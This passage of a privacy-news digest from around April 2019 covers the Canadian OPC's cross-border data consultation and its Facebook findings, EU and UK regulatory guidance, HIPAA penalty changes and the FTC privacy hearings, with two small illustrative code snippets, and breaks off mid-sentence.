The Office of the Privacy Commissioner of Canada has released a supplementary discussion document to explain its decision to revise its policy position on trans-border data flows. The OPC also lists out eight questions in order to better facilitate the consultation it launched. “Our change in position is based ultimately on our obligation to ensure that our policies reflect a correct interpretation of the current law,” the discussion document reads. “During the Equifax investigation, it became apparent that the position that a transfer … is not a ‘disclosure’ is debatable and likely not correct as a matter of law.” [priv.gc.ca]

CA – OPC Recommends Consent for Cross Border Data Transfers

On April 9, 2019, the Office of the Privacy Commissioner of Canada (OPC) issued a new Consultation on transborder dataflows, recommending that organizations be required to obtain individuals’ consent — express or implied — for transfers of personal data outside of Canada. The OPC is accepting comments on the Consultation through June 4, 2019 [on April 23 OPC issued a “supplementary discussion document”]. The Consultation is a significant departure from the OPC’s current interpretation of cross-border data transfer requirements [see OPC guidelines here] under Canada’s Personal Information Protection and Electronic Documents Act [PIPEDA: see OPC guidance here]. These well-established cross-border requirements allowed organizations to rely on the principle of accountability to protect personal data transferred outside of Canada. The Consultation proposes requiring express or implied consent for cross-border data transfers, depending on the sensitivity of the information at issue and the reasonable expectations of the individual. To support its proposed change, the OPC has explained that the accountability principle merely regulates cross border data processing “in part,” and that “nothing in PIPEDA exempts data transfers from consent requirements.” As a result, the OPC’s view is that the general requirement under PIPEDA — that organizations obtain consent for any collection, use or disclosure of personal data, unless an enumerated exception applies — similarly extends to cross border data transfers. It is reasonable to require organizations to inform consumers of cross-border transfers as part of required privacy disclosures – including in privacy notices and policies. A consent requirement would exceed even the GDPR’s limitations on cross-border data transfers, and could be disruptive to US and Canadian businesses. [cyber/data/privacy insights (Cooley) | OPC issues supplementary discussion document for its consultation on transborder dataflows | The battle over data localization | The many lessons of the Equifax data breach | Rewriting Canadian privacy law: Commissioner signals major change on cross-border data transfers | Do Cross-Border Data Transfers From Canada Require Consent? | Privacy Commissioner Proposes a Consent Requirement for Transborder Data Flows | OPC Proposes a Reversal in its Approach to Transfers of Personal Information to Service Providers for Processing]

CA – OPC Taking Facebook to Court, Says Company Breached Privacy Laws

Canada’s federal privacy watchdog plans to take Facebook to court following an investigation that found the social media giant broke a number of privacy laws and failed to take responsibility for protecting Canadians’ personal information. “Canadians are at risk because the protections offered by Facebook are essentially empty,” said Privacy Commissioner Daniel Therrien after releasing a blistering report into the company’s operations Thursday [see OPC PR, report #2019-002, info chart & Commissioner’s comments]. Therrien and his B.C. counterpart, Michael McEvoy, joined forces last spring to investigate the roles of Facebook and the Canadian company AggregateIQ in the scandal involving the British firm Cambridge Analytica. [watch full news conference & questions] [CBC News | ‘Their privacy framework was empty’: Facebook blasted by Canadian privacy watchdogs for breaking law and refusal to acknowledge findings | Facebook data leak: Province-by-province breakdown of affected Canadians]

CA – YVR Rejects Ads with Information on Digital Privacy

OpenMedia [wiki], a Vancouver-based internet privacy group, says it tried to place ads pointing travellers to information on digital privacy rights at the Canada Line’s YVR station. The ads were rejected by the airport, which has authority over the station [see OM PR]. The ads promote the group’s website, borderprivacy.ca, which was made in partnership with the British Columbia Civil Liberties Association [see here & wiki here] and provides resources in multiple languages outlining rights on having digital devices searched at the border and how to submit a complaint if those rights are violated. The website also links to a petition seeking change to these search laws. YVR explained by email that it felt the ad “pitted two groups against each other and it also has potential to add undue stress to the travel experience.” The airport also stated that it “aims to be non-political” and felt the link to a petition was problematic. YVR added that it provides its own resource website on passenger rights and advertises that site on digital signage throughout the airport. Victoria Henry [here], a rights campaigner at OpenMedia, said: “This is a huge issue for a lot of people and a lot of people in Canada and folks who are crossing our border just don’t know anything about these rules and some of the vulnerabilities and potential privacy violations they could be facing.” The key issue, Henry explained, is that the laws haven’t been updated in quite some time while cellphone use has increased significantly: “the laws that govern these kind of searches are just so out of date. They haven’t been meaningfully changed to reflect how much information we carry on our phones now.” [Vancouver is Awesome]

CA – SK OIPC: RM’s Lack of Record-Keeping Made Breach Investigation Impossible

Local governments in smaller communities continue to be “challenged” by provincial privacy legislation, says Saskatchewan Information and Privacy Commissioner Ron Kruzeniski [see here]. Lack of education about the Local Authority Freedom of Information and Protection of Privacy Act (LA FOIP), knowledge gaps and the time available to process requests are among the most significant issues faced by the province’s towns, rural municipalities and villages, says the OIPC. In a report released April 5 [Investigation Report 298-2018], Kruzeniski weighed in on a case involving the Rural Municipality of Blaine Lake [also see his earlier January 8 Review Report 223-2018], in which the OIPC was unable to access necessary records. Blaine Lake had hired a new administrator who could not track down the information Kruzeniski’s office requested; the OIPC was told the old administrator “did not keep proper records,” so the municipality couldn’t help. Consequently, Kruzeniski was unable to proceed with the Blaine Lake investigation. Blaine Lake does not have a privacy breach protocol, Kruzeniski wrote. In an interview, Kruzeniski said having protocols in place is necessary since staff routinely change, and those protocols would give a rural municipality the ability to “continue on.” He said his office is finding that smaller communities are more challenged by the privacy legislation, since larger local governments can “engage staff” who are trained, who repeatedly do the required tasks and who become familiar with the process. “We’re just finding many of [these small localities] just don’t have the resources to sort of handle the processing,” Kruzeniski said. [Saskatoon StarPhoenix]

CA – Court Sidesteps Constitutional Questions in Google ‘Right To Be Forgotten’ Case

Google was handed a setback this month in a reference case brought by the Privacy Commissioner of Canada last year [OPC 2018 notice] over the so-called “right to be forgotten”. Federal Court Prothonotary Mireille Tabib ruled that the court won’t delve into the thorny constitutional questions wrapped up in the matter. Instead, the Federal Court will judge two specific points related to Canada’s privacy law: first, whether Google’s search engine could be deemed under PIPEDA to “collect, use or disclose personal information in the course of commercial activities”; and second, whether Google is exempt from the discussion on the grounds that it “involves the collection, use or disclosure of personal information for journalistic, artistic or literary purpose.” In a paper last year, Therrien’s office presented a legal interpretation which said that the right to de-index search results already exists under Canada’s Personal Information Protection and Electronic Documents Act (PIPEDA). Therrien launched the reference case in Federal Court to confirm that interpretation. But Google challenged the reference case, arguing not only that the company is exempt on both grounds in this instance, but that the specific questions from the OPC were too narrow because they did not address the constitutional questions potentially wrapped up in de-indexing search results. Google has appealed the ruling. In an emailed statement, the company’s lawyer argued that the case must be viewed as a matter of freedom of expression. In a separate ruling in March [see here], the same court official ruled that a coalition of media organizations, including Postmedia, could not receive standing as intervenors in the case. [Financial Post | Scassa: Right to Be Forgotten Reference to Federal Court Attracts Media Concern]

CA – Academics and Rights Advocates Urge Senators to Bolster No-Fly List Appeal Process

The Liberal government’s sweeping national-security bill [C-59] doesn’t go far enough to protect the rights of people ensnared by Canada’s no-fly list [wiki], academics and civil-liberties advocates told senators Monday [before the National Security and Defence Committee – Notice & Web Cast]. The bill does take aim at the recurring problem of mistaken matches for names on the no-fly list, opening the door to a new system of redress numbers. However, critics say the legislative changes will do little to help those actually on the no-fly list who are stopped from getting on planes. Someone prevented from flying could ask for reconsideration of their case and appeal an unfavourable decision to the courts. However, the person is given only a summary of the intelligence and evidence used against him or her, which could include hearsay, Cara Zwibel of the Canadian Civil Liberties Association said. In addition, the judge dealing with a case can rely on secret evidence that was not included in the summary, she told the senators. “The appellant’s right to be heard is not meaningful if she or he does not know the case to meet.” She added that the process could be improved by assigning a special legal advocate, one with the clearance to review and test the government’s case. Errol Mendes, a law professor at the University of Ottawa, said the law should “definitely include special advocates” to represent people the government puts on the list. He also stressed to the committee that there is a “big difference” between a special advocate acting on behalf of a listed person and an amicus, who is effectively a servant of the court. Craig Forcese [see here], who also teaches law at the University of Ottawa, emphasized the importance of including special advocates not just in no-fly proceedings, but also to ensure fairness in passport-revocation cases. Privacy Commissioner Daniel Therrien said that as a result of revisions to the proposed Liberal legislation adopted by the House of Commons, it is “now fairly balanced and clearly an improvement over the current law.” [BurnabyNow]

CA – NL OIPC Urges Police to Consider Privacy Reform

Newfoundland Information and Privacy Commissioner Victoria Woodworth-Lynas has called for the Royal Newfoundland Constabulary to consider changes to its privacy policies and practices. Her recommendations stem from a breach of an officer’s personal and medical information by another officer last July. An investigation by the commissioner revealed the RNC did not offer sufficient protection for the officer’s breached information, which was accessed when the other officer retrieved a form that contained personal details about the victim from a manager’s office. “I have serious concerns regarding the lapse in physical security practices in this case,” Woodworth-Lynas said. “I strongly recommend further and targeted communication with all employees on this issue.” [The Telegram]

Consumer

WW – Rise of ‘Privacy Fatigue’: One in Three People Don’t Know How to Protect Their Online Privacy

According to recent work by Kaspersky Lab, one in three consumers lacks the knowledge or tools to fully protect their privacy online [see blog post]. The industry has started calling this “privacy fatigue“, alluding to the constant stress some people feel that third parties are exploiting their private information. The Kaspersky Lab survey involved 11,887 participants who used the company’s software in 21 countries. Researchers found that 17% of individuals acknowledged they had uploaded private information about themselves that shouldn’t really be in the public domain, or had seen family members behave this way. Among children under 18, the figure rises to 22.3%, or almost a quarter of respondents. Privacy fatigue affects the 32.2% of respondents who say they don’t know how to fully protect their privacy online and are stressed by that fact. One in ten people say they have lost interest in how they can further improve their privacy. Kaspersky found that a fifth of the survey’s participants did not make any effort — such as clearing browsing history or using VPNs [wiki here] — to secure their privacy. Of those who became aware of personal data misuse, more than a third (36%) felt stressed when it happened, one in five (21%) experienced monetary loss, and a quarter (25%) were disturbed by spam and adverts. Kaspersky recommends the following simple steps to secure your digital privacy: 1) Start managing your digital footprint: keep a list of your accounts, regularly check whether your data has become publicly accessible, and create a secondary email address; 2) Use special digital tools that allow surfing the internet safely, such as private browsing or detection of webcam or mic access by untrusted apps; and 3) Install reliable security solutions that include a set of utilities to minimize the risks of privacy violation. [ZME Science]

WW – Apple Removes Some Parental Control Apps Over Privacy Concerns

In a company blog post, Apple explains why it removed several parental control apps from its App Store. Apple said, “we did it for a simple reason: they put users’ privacy and security at risk.” A number of the apps in question used Mobile Device Management technology, something Apple characterizes as highly invasive technology. “MDM gives a third party control and access over a device and its most sensitive information including user location, app use, email accounts, camera permissions, and browsing history,” Apple stated. Though MDM has some legitimate uses, including as an installation for enterprise devices, the technology can be “incredibly risky” and violates Apple’s App Store policies. [Apple]

EU Developments

EU – European Parliament Highlights Data Protection Achievements from 2014–19 Term

Honoring a request from the Committee on Civil Liberties, Justice and Home Affairs, the European Parliament released a briefing covering its “personal data protection achievements” during the 2014–19 term. Parliament cited the EU General Data Protection Regulation, Regulation 2018/1725 and the adequacy decisions reached as among the accomplishments of the five-year period. “Parliament has played a key role in shaping EU legislation in the field of personal data protection by making protecting privacy into a political priority,” the briefing states. “An almost complete overhaul of the EU personal data protection rules has taken place during the current legislative term.” [Statewatch]

EU – EDPB Issues Guidelines on Contract as a Legal Basis for Processing

The European Data Protection Board (EDPB) has published draft guidelines on the “processing of personal data under the contractual legal basis in the context of the provision of online services to data subjects” [see 14 pg PDF here]. The guidelines notably seem to object to a digital agreement where services are exchanged for personal data. Moreover, these guidelines, even though restricted to an online agreement, can also be applied more generally to many other situations where GDPR Article 6(1)(b) is used as a legal basis in the offline world. These guidelines are currently open to consultation. [This blog post describes the following aspects of the guidelines]:

1)      Scope of the Guidelines: Agreements for Online Services – The guidelines relate to a specific category of agreements, meaning those under which data subjects are provided “online services”, or access to platforms that do not require a direct payment from the users but are financed by targeted advertising instead;

2)      Choosing the Relevant Legal Basis – In relation to such services, the most obvious legal basis would be consent, legitimate interest or contract, the latter being the subject matter of the guidelines;

3)      The Necessity Test – For EDPB, the essential question that a controller has to address is: “Is the processing of data genuinely and objectively necessary for the performance of the contract/or in order to take pre-contractual steps at the request of a data subject?”;

4)      EDPB’s Guidance Questions and Examples – An assessment should be made before the start of the processing activity, based on four questions:

  a) “What is the nature of the service?;
  b) What is the exact rationale of the contract?;
  c) What are the essential elements of the contract?; and
  d) What are the mutual perspectives and expectations of the parties to the contract?”

It is important that stakeholders review these guidelines carefully and submit their views or arguments in the consultation process, where necessary, by 24 May 2019. [Security & Privacy // Bytes (Squire Patton Boggs) | EDPB guidelines on processing personal data under GDPR, Article 6(1)(b)]

UK – ICO Bans Use of ‘Nudge Techniques’ in New Draft Guidelines

The U.K. Information Commissioner’s Office has published draft guidelines on the protection of children’s privacy when they use online services. In the guidelines, the ICO bans the use of “nudge techniques” that encourage further engagement, such as Facebook’s “like” button or “streaks” within the Snapchat app. Violations of the draft guidelines would result in penalties under the EU General Data Protection Regulation. “Reward loops or positive reinforcement techniques (such as likes and streaks) can also nudge or encourage users to stay actively engaged with a service, allowing the online service to collect more personal data,” the ICO report states. The agency has launched a consultation for its new code of practice and will accept comments until May 31. [Financial Times]

EU – CNIL Releases Report on UX/UI Design and Data Protection

The CNIL’s digital innovation laboratory, the LINC, released a report titled “Shaping Choices in the Digital World.” The report looks at the use of dark patterns, offers policy recommendations, and proposes avenues for professionals to collaborate on privacy-friendly design practices. “It addresses the entire digital ecosystem by giving some operational recommendations to strengthen the control and choice to which users are entitled,” former CNIL President Isabelle Falque-Pierrotin writes in the report. “The CNIL intends to participate in this and considers the attention taken with design solutions as a potential framework on which to build its legal and technical expertise and better fulfil its mission to protect freedoms.” [CNIL.fr]

Facts & Stats

US – Only 4/10 Privacy Execs Confident in Ability to Keep Up With New Regs

A study conducted by Gartner found only 4 in 10 privacy executives feel confident in their organizations’ ability to keep up with new regulations. Privacy executives listed “adapting to a volatile regulatory environment,” “establishing a privacy strategy to support digital transformation” and “implementing an effective third-party risk management program” as three of their top priorities for 2019. “Strategic and regulatory flexibility will be critical to the success of privacy functions this year,” Gartner Managing Vice President Brian Lee said. “Organizations still feeling the full force of complying with Europe’s General Data Protection Regulation are now being asked to adapt to additional regulatory requirements, which can impact both short- and long-term strategy.” [Gartner Group]

Filtering

UK – Adult Website Ban for UK Minors Begins July 15

The ban on underage access to pornographic websites will go into effect in the U.K. July 15. The new mandate, which is part of the Digital Economy Act passed by Parliament in 2017, will require porn sites to verify that a user is over the age of 18 before allowing access. While the law does not include privacy rules for the misuse of user information, individuals will still be protected under the EU General Data Protection Regulation. [Ars Technica]

Genetics

US – Why Sperm Donor Privacy is Under Threat from DNA Sites

When sperm donors join clinics, their critical right to privacy has always been guaranteed. But that right is being smashed by the rise of DNA tracking services like Ancestry.com and 23andMe, as people turn to the services to track down their biological relatives. That’s according to Guido Pennings, professor of ethics and bioethics at Ghent University in Belgium, who claimed in a paper that “searches through genetic databases jeopardize the privacy of people who did and did not register on them.” [Forbes]

Health / Medical

US – HIPAA Penalty Caps to Be Reduced and Tied to Culpability Level

In a dramatic turn, the US Department of Health and Human Services (HHS) has announced that effective immediately, penalties for many HIPAA violations will be subject to substantially reduced limits. After a record year of collecting high-dollar settlements, the agency has pulled back and tied its own hands through a Notification of Enforcement Discretion [see Federal Register here & PDF] that will likely result in lower penalties and settlement agreement amounts. Under the HITECH Act of February 2009 [see here & wiki here], Congress strengthened HHS’s HIPAA enforcement authority by authorizing increased minimum and maximum potential Civil Monetary Penalties (CMPs) for HIPAA violations. The HITECH Act established four culpability tiers for HIPAA violations:

1)      the person did not know (and, by exercising reasonable diligence, would not have known) that the person violated the provision;

2)      the violation was due to reasonable cause, and not willful neglect;

3)      the violation was due to willful neglect that is timely corrected; and

4)      the violation was due to willful neglect that is not timely corrected.

Prior to this recent exercise of “enforcement discretion,” the Department interpreted the HITECH Act to allow an annual limit of $1.5 million per HIPAA violation per year, regardless of the level of culpability. The Notification of Enforcement Discretion states that upon further review, HHS has determined that a “better reading” of the HITECH Act is to apply tiered annual limits, ranging from $25,000 to $1.5 million, depending on the level of culpability. In light of this new determination, and as a matter of its enforcement discretion, HHS is announcing revised annual CMP limits for HIPAA violations, with the expectation of codifying the new interpretation as part of a future rulemaking process. HHS will use this new penalty tier structure going forward for all HIPAA enforcement actions (a minimal sketch of the tier-to-cap mapping follows below). The significantly reduced annual limits for HIPAA violations—other than those due to uncorrected willful neglect—will likely bring into focus levels of culpability in the enforcement process. A renewed focus on culpability provides incentives for covered entities and business associates to demonstrate good faith compliance efforts, so that any enforcement action would be subject only to the lower penalty tiers. In fact, under the new framework, organizations have significant financial incentives to correct potential “Willful Neglect” violations in a timely manner, to avoid the penalties associated with the highest tier. [Chronical of Data Protection (Hogan Lovells) | HIPAA Penalties Change Under HHS Notice of Enforcement Discretion]
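For concreteness, the new structure can be read as a simple tier-to-cap lookup. The Python sketch below uses the annual limits stated in the HHS notice ($25,000, $100,000, $250,000 and $1.5 million for the four HITECH culpability tiers listed above); it is an illustration of the arithmetic, not legal guidance.

# Annual CMP caps per culpability tier under HHS's April 2019
# Notification of Enforcement Discretion (tier numbers follow the
# HITECH culpability levels listed above).
ANNUAL_CAPS = {
    1: 25_000,      # no knowledge
    2: 100_000,     # reasonable cause
    3: 250_000,     # willful neglect, timely corrected
    4: 1_500_000,   # willful neglect, not corrected
}

def capped_penalty(tier: int, total_assessed: int) -> int:
    """Cap a calendar-year penalty total at the tier's annual limit."""
    return min(total_assessed, ANNUAL_CAPS[tier])

# Example: $2M assessed for violations due to reasonable cause is
# capped at $100,000 for the year under the new interpretation.
print(capped_penalty(2, 2_000_000))  # 100000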

US – Study: Mental Health Apps Share Personal Data Without User Knowledge

A recent study reveals that free smartphone apps for people dealing with depression or those seeking to quit smoking are sharing user data without informing or consulting users. The study, published in JAMA Network Open in 2019, reveals that 33 of 36 health apps, which are available on Android and iOS app stores, shared user information that could reveal online behaviors to advertising and data analytics companies. Twenty-nine of the 36 apps transmitted data to Facebook and Google for marketing purposes, while fewer than half of the apps disclosed this sharing in their privacy policies. Some apps shared information such as health diary entries, self-reports about substance use, and usernames, the report states. [The Verge]

Intellectual Property

US – Cardozo Offers First Online Master’s in Data and Privacy Law for Non-Lawyers

New York City-based Yeshiva University Benjamin N. Cardozo Law School [here & wiki here] is launching what it says is the first master’s degree in data and privacy law offered by a law school. The goal of the program is to give non-lawyers a foundation in data and privacy law so that they can ensure their companies are compliant with the latest regulations. The school is hoping to attract information security professionals, IT managers, small business owners, tech entrepreneurs and paralegals to the program. The degree can be completed in 18 to 24 months, with almost all coursework done online, and costs $38,850. A pilot cohort of six students started in the online program last fall, and the Manhattan school is expanding the Master of Studies in Law in Data and Privacy this fall in a new collaboration with online learning provider Noodle Partners [here], with the hope of enrolling about 20 students. Applications for the fall class are open. Professor Felix Wu [here] said Cardozo’s program differs from existing cybersecurity master’s programs offered by law schools, which tend to focus more on global cybersecurity issues and policy. “We’re really focused on trying to think of this from the perspective of individual companies needing to figure out how best to comply with all these developing standards,” he said. “The focus is much more on what you might regard as the more day-to-day aspects of governing data, as opposed to the global aspects of cybersecurity issues.” [New York Law Journal (Law.com)]

Internet / WWW

US – NIST Seeks Feedback for Privacy Framework Discussion Draft

The U.S. National Institute of Standards and Technology has started to accept feedback on the recently released discussion draft for its privacy framework. NIST seeks feedback on whether the privacy framework can be implemented with the structure of the “Framework for Improving Critical Infrastructure Cybersecurity,” as well as its coverage of privacy risk management and the informative references found within the document. “In general, NIST is interested in whether the Privacy Framework as proposed in this discussion draft could be readily usable as part of an enterprise’s broader risk management processes and scalable to organizations of various sizes — and if not, how it could be improved to suit a greater range of organizations,” the agency wrote in the announcement. [NIST.gov]

Law Enforcement

CA – Nova Scotia Orders Moratorium on Street Checks Across Province

Justice Minister Mark Furey ordered a provincewide moratorium on identity checks of pedestrians and passengers in motor vehicles but stopped short of permanently banning the controversial police tool or offering a formal apology to African Nova Scotians [see PR & guidance]. The move comes 21 days after a human rights report recommended banning or strictly regulating street checks in the province. In the report, University of Toronto criminologist Scot Wortley found black Nova Scotians were stopped and questioned by police six times more frequently than whites, and that the controversial practice has “contributed to the criminalization of black youth, eroded trust in law enforcement and undermined the perceived legitimacy of the entire criminal justice system.” [see notice & press conference video here, 186 pg PDF Street Checks Report – Nova Scotia Human Rights Commission, and news coverage here] Furey, a former police officer, maintained his view that police checks are a valuable policing tool when used with discretion. Rather than opting for a permanent ban, he chose a temporary halt to carding while a stakeholder committee works to adopt several recommendations from Wortley’s report and ultimately comes up with regulations on street checks. [The ChronicleHerald (Halifax) | Halifax police commission pushes for suspension of street checks | Halifax police board recommends suspension of street checks, calls for apology]

US – Court Rules Tire ‘Chalking’ Unconstitutional

A federal appeals court ruled this week that chalking car tires is unconstitutional, deeming it a violation of Fourth Amendment protections against unreasonable searches and seizures. For years, traffic enforcement officers have marked car tires with chalk so that, on a return pass, they can see whether a car has moved. Alison Taylor, a resident of Saginaw, Mich., took the city to court after receiving more than a dozen citations in a year, alleging that a local parking enforcement officer, Tabitha Hoskins, named as a defendant alongside the city in the case, was violating her constitutional rights. The city initially won, but the U.S. Sixth Circuit Appeals Court reversed the decision, saying that chalking is a form of trespass that requires a warrant, similar to attaching a tracker to a car to monitor its real-time location, according to the court’s ruling. The Fourth Amendment generally protects Americans from law enforcement searches of their homes or devices without a court-approved warrant to obtain evidence of a crime. In this case, the court found that the parking enforcement officer trespassed on Taylor’s car “because the City made intentional physical contact with Taylor’s vehicle,” and that the chalking was an “attempt to find something or to obtain information” from the car — albeit in a low-tech way — specifically to determine whether the vehicle had “been parked in the same location for a certain period of time.” Nathan Freed Wessler, senior staff attorney with the ACLU’s Speech, Privacy, and Technology Project, is worried that the legal precedent could lead to the adoption of more privacy-invasive technologies instead. Some cities are already using more advanced technologies like automatic license plate recognition (ALPR) [wiki here] systems to scan plates to see if a vehicle has moved from one place to another. ALPR remains controversial but arguably still legal at the federal level — even if these plate scanners have faced challenges at the local level. [TechCrunch | Court Rules Chalking Parked Car Tires Violates Fourth Amendment | Here’s Why Police Using Chalk Marks On Your Tires To Write Tickets Violates The 4th Amendment | Lose the Chalk, Officer: Court Finds Marking Tires of Parked Cars Unconstitutional]

US – ODNI, NSA Publish ‘Statistical Transparency Report’

The U.S. Office of the Director of National Intelligence and the National Security Agency have released the sixth edition of the “Statistical Transparency Report Regarding Use of National Security Authorities.” The report offers a review of the use of warrants and law enforcement activities under the Foreign Intelligence Surveillance Act of 1978. This year’s report shows 9,637 warrantless queries were made for U.S. citizen communications data from NSA databases in 2018. The number of queries is up from 7,512 in 2017. The report also reveals the number of foreign organizations or individuals that were targeted under Section 702 of FISA jumped from 129,080 to 164,770, while the number of U.S. phone call records collected dropped by nearly 100 million. [ZD Net]

Online Privacy

WW – Facebook Hit With Three Privacy Investigations in a Single Day

Facebook was hit Thursday by a trio of investigations over its privacy practices. First came a probe by the Irish data protection authority [here] looking into the breach of “hundreds of millions” of Facebook and Instagram user passwords that were stored in plaintext on its servers. The company will be investigated under the European GDPR data protection law [here & wiki here], which could lead to fines of up to four percent of its global annual revenue for the infringing year — potentially several billion dollars. Then the Office of the Privacy Commissioner of Canada said it plans to take Facebook to federal court to force the company to correct its “serious contraventions” of Canadian privacy law [see OPC PR, report #2019-002, info chart & Commissioner’s comments]. The findings came in the aftermath of the Cambridge Analytica scandal, which vacuumed up more than 600,000 profiles of Canadian citizens. [watch full news conference & questions] Lastly, New York Attorney General Letitia James announced she is looking into the recent “unauthorized collection” of 1.5 million user email addresses, which Facebook used for profile verification but which inadvertently also scraped those users’ contact lists [see AG’s PR here]. You might think a trifecta of terrible news would be crushing for the social network. Alas, its stock was up close to 6 percent at market close, adding some $40 billion to its value. [TechCrunch | Ireland – Data Protection Commissioner to investigate Facebook over password storage | Canada – Privacy watchdog taking Facebook to court, says company breached privacy laws | New York – Facebook’s Email-Harvesting Practice Is Under Investigation in N.Y.]

WW – How Data Inference Technology Exposes Privacy-Minded Users

In an op-ed, Zeynep Tufekci explains how “data inference” technology is used to uncover information on even the most privacy-conscious online users. Due to the abundance of data on billions of other people on the internet, she points out that a user’s discretion is no longer enough to guarantee online privacy. Highlighting recent examples proving tech’s ability to ascertain user data from others, Tufekci suggests phones and devices should be designed to be more privacy-protected from the start and urges that legislation be introduced to address computational inference. [The New York Times]
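Tufekci’s piece is about policy rather than code, but the core mechanism is easy to illustrate. The toy Python sketch below (invented names and attributes, not any company’s actual method) infers an undisclosed attribute of one person from what that person’s contacts disclose, the homophily-style inference that makes individual discretion insufficient:

from collections import Counter

# Toy illustration: even if a person shares nothing, an attribute can
# often be inferred from what their contacts disclose (homophily).
# All names and attribute values below are invented for the example.
disclosed = {
    "amy": "city_a", "ben": "city_a", "eve": "city_a", "raj": "city_b",
}
contacts_of_target = ["amy", "ben", "eve", "raj"]

votes = Counter(disclosed[c] for c in contacts_of_target if c in disclosed)
guess, count = votes.most_common(1)[0]
print(f"inferred: {guess} ({count}/{len(contacts_of_target)} contacts)")
# inferred: city_a (3/4 contacts)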

Privacy (US)

US – Facebook Expects to be Fined Up to $5 Billion by F.T.C. Over Privacy Issues

Facebook said on Wednesday that it expected to be fined up to $5 billion by the Federal Trade Commission for privacy violations. The penalty would be a record by the agency against a technology company and a sign that the United States was willing to punish big tech companies. The social network disclosed the amount in its quarterly financial results, saying it estimated a one-time charge of $3 billion to $5 billion in connection with an “ongoing inquiry” by the F.T.C. Facebook added that “the matter remains unresolved, and there can be no assurance as to the timing or the terms of any final outcome.” [The New York Times — Additional coverage at The Wall Street Journal here & The Washington Post here]

US – FTC Hearings #12: The FTC’s Approach to Consumer Privacy Day 1: April 9

The FTC held its 12th Hearing on Competition and Consumer Protection on April 9 and 10, 2019. The overall theme of the two-day hearing centered on the FTC’s approach to consumer privacy [see FTC hearings schedule & DCP blog posts on all the hearings]. FTC Chairman Simons presented opening remarks emphasizing the positives and negatives of data collection, stating that “we live in an age of technological benefits powered by data.” He made clear we need to evaluate our approach to privacy in a shifting world. [Watch the first day of the hearings: session 1; and session 2] Panel 1 – Goals of Privacy Protection — The first panel began with moderator James Cooper, Deputy Director for Economic Analysis at the FTC, presenting three key questions: 1) What do consumers want?; 2) Is there some reason firms aren’t responding?; and 3) Is there something the government can do to improve things? — as well as the “privacy paradox”, whether the government should take action or not, and what harm any privacy regulation should be directed at. Responding panelists included: Neil Chilson, Senior Research Fellow for Technology and Innovation at the Charles Koch Institute; Paul Ohm, Professor of Law at Georgetown University; and Alastair Mactaggart, Chairman of Californians for Consumer Privacy. Panel 2 – The Data Risk Spectrum: From De-Identified Data to Sensitive Individually Identifiable Data — Jules Polonetsky, CEO of the Future of Privacy Forum, gave a presentation on de-identification, and Michelle Richardson, Director of the Data and Privacy Project at the Center for Democracy and Technology (CDT), spoke about CDT’s regulatory recommendations for de-identification and data protection. Responding panelists included: Aoife Sexton, Chief Privacy Officer of Trūata; Deven McGraw, General Counsel and Chief Regulatory Officer at Ciitizen; and Shane Wiley, Chief Privacy Officer at Cuebiq. Panel 3 – Consumer Demand and Expectations for Privacy — began with the question of whether there are consumer expectations and demands relevant to creating a privacy policy. [Panellists included]: Laura Pirri, Senior Legal Director and Data Protection Officer at Fitbit; Heather West, Senior Policy Manager at Mozilla; Lorrie Faith Cranor, Professor of Computer Science, Engineering, and Public Policy at Carnegie Mellon University; Ariel Fox Johnson, Senior Counsel of Policy and Privacy at Common Sense; Jason Kint, CEO of Digital Content Next; and Avi Goldfarb, Professor of Marketing and Rotman Chair in Artificial Intelligence and Healthcare at the University of Toronto. Panels 4 and 5 – Current Approaches to Privacy — The day concluded with a double panel examining current approaches to regulating privacy, primarily focused on the European General Data Protection Regulation (GDPR), the California Consumer Privacy Act (CCPA), and existing US federal privacy laws and enforcement. Professor Margot Kaminski, University of Colorado Law, began the panel with an overview of these laws and set out a taxonomy of the key features and differences between modern privacy regimes: 1) Consumer protection vs. data protection regimes; 2) Omnibus vs. sectoral regimes; 3) Notice and choice vs. ‘something else’ regimes; 4) Individual rights vs. compliance regimes; and 5) Hard law vs. soft law regimes. Panelists then discussed the goals of privacy legislation and the virtues and shortcomings of the GDPR and CCPA in the context of the consumer rights, corporate obligations, and enforcement mechanisms that should characterize a new US federal baseline privacy regime. [Disruptive Competition Project]

US – FTC Hearings #12: The FTC’s Approach to Consumer Privacy Day 2: April 10

The FTC held its 12th Hearing on Competition and Consumer Protection on April 9 and 10, 2019. The overall theme of the two-day hearing centered on the FTC’s approach to consumer privacy [see FTC hearings schedule & DCP blog posts on all the hearings]. [Watch the second day of the hearings: session 1; and session 2] Panel 1 – Role of Notice and Choice — The question presented for discussion was “When we refer to notice and choice in the privacy context, what do we mean?” Responding panellists included: Jordan Crenshaw, Assistant Policy Counsel of the Chamber Technology Engagement Center at the US Chamber of Commerce; Pam Dixon, Founder and Executive Director of the World Privacy Forum; Katherine Tassi, Deputy General Counsel, Privacy and Product at Snap Inc.; Florencia Marotta-Wurgler, Professor of Law at New York University; Rachel Welch, Senior Vice President of Policy and External Affairs at Charter Communications; and Neil Richards, Koch Distinguished Professor of Law at Washington University in St. Louis. Panel 2 – Role of Access, Deletion, and Correction – Moderators kicked off the panel with this question: “What do you see as the goals for giving consumers access, rights to delete, correct, and port data, especially these days where there are complicated data systems involving artificial intelligence (AI) and big data?” Panel respondents included: Chris Calabrese, Vice President of Policy for the Center for Democracy and Technology; Jennifer Barrett Glasgow, Executive Vice President of Policy and Compliance at First Orion; Katie Race Brin, Chief Privacy Officer at 2U Inc.; Gus Rossi, Global Policy Director at Public Knowledge; Jonathan D. Avila, Vice President and Chief Privacy Officer at Walmart; and Ali Lange, Senior Public Policy Analyst at Google. Panel 3 – Accountability — began with a discussion on how accountability differs from other approaches to consumer privacy and what accountability really means to a layperson. [Panellists included]: Martin Abrams, Executive Director and Chief Strategist of the Information Accountability Foundation; Ari Ezra Waldman, Professor of Law at New York Law School; Karen Zacharia, Chief Privacy Officer at Verizon; Corynne McSherry, Legal Director of the Electronic Frontier Foundation; and Mike Hintze, Partner at Hintze Law PLLC. Panel 4 – Is the FTC’s Current Toolkit Adequate? Part 1 — began with the difficult question of how to evaluate the success of the agency’s privacy enforcement activities. [Panellists included]: Marc Groman, Groman Consulting Group LLC; Christine Bannan, Electronic Privacy Information Center; Jane Horvath, Apple; Professor Peter Swire, Georgia Institute of Technology; Stuart Ingis, Venable; and Jon Leibowitz, Davis Polk. Panel 5 – Is the FTC’s Current Toolkit Adequate? Part 2 — began with a discussion of whether the agency could do more with its existing authority. Panellists included: Professor David Vladeck, Georgetown University Law Center; Justin Brookman, Consumer Reports; Berin Szóka, President of TechFreedom; former FTC Commissioner Julie Brill, now at Microsoft; and David Hoffman, 